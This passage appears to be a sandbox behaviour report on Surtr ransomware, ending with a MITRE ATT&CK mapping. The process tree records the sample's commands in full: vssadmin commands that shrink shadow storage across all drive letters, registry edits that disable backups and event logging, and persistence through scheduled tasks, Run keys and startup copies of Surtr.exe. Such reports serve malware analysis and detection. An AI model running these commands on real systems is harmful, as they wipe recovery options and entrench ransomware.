    3⤵
    PID:2452
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5336
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:6028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
  2⤵
  PID:5524
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
  2⤵
  PID:5328
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:5676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:5984
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:3400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
  2⤵
  PID:5968
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4280
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:5872
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:4820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
  2⤵
  PID:5856
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3024
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:5820
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
  2⤵
  PID:5792
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:5700
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1260
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
  2⤵
  PID:6060
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
  2⤵
  PID:4832
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
  2⤵
  PID:1876
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
  2⤵
  PID:4000
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:5412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  PID:1912
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4996
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
  2⤵
  PID:5892
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3844
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
  2⤵
  PID:6140
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3232
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
  2⤵
  PID:5924
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  PID:6104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
  2⤵
  PID:6092
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
  2⤵
  PID:6084
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5740
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
  2⤵
  PID:6000
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:2492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
  2⤵
  PID:4968
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1252
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
  2⤵
  PID:4400
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
  2⤵
  PID:4948
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  PID:4724
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:4564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PublicData_ocsrbkxk57oqbr.surt" "%TEMP%\Service\PublicData_ocsrbkxk57oqbr.surt"
  2⤵
  PID:5548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:2252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:3992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  PID:5428
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:4744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
  2⤵
  PID:5848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:4532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\PrivateData_ocsrbkxk57oqbr.surt" "%TEMP%\Service\PrivateData_ocsrbkxk57oqbr.surt"
  2⤵
  PID:2644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
  2⤵
  PID:5744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
  2⤵
  PID:4116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
  2⤵
  PID:3432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
  2⤵
  PID:2508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
  2⤵
  PID:5628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:5596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:3156
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
  2⤵
  PID:528
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
  2⤵
  PID:3840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
  2⤵
  PID:1444
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:2476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
  2⤵
  PID:4380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:2412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
  2⤵
  PID:4888
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  - Drops startup file
  - Enumerates connected drives
  PID:2492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:5532
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:5600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:5576
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:5348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
  2⤵
  PID:4240
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    - Adds Run key to start application
    PID:3140

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4860

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:5384

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:232

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
1⤵
- Interacts with shadow copies
PID:4324

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
1⤵
- Interacts with shadow copies
PID:2768

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:732

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
1⤵
PID:5144

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3028

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5128

C:\Windows\SysWOW64\attrib.exe
attrib +R /S "C:\ProgramData\Service"
1⤵
- Views/modifies file attributes
PID:3960

C:\Windows\SysWOW64\attrib.exe
attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
1⤵
- Views/modifies file attributes
PID:4920

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=unbounded
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4288

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=unbounded
1⤵
- Interacts with shadow copies
PID:3424

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
1⤵
PID:768

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4884

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
1⤵
- Interacts with shadow copies
PID:4216

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery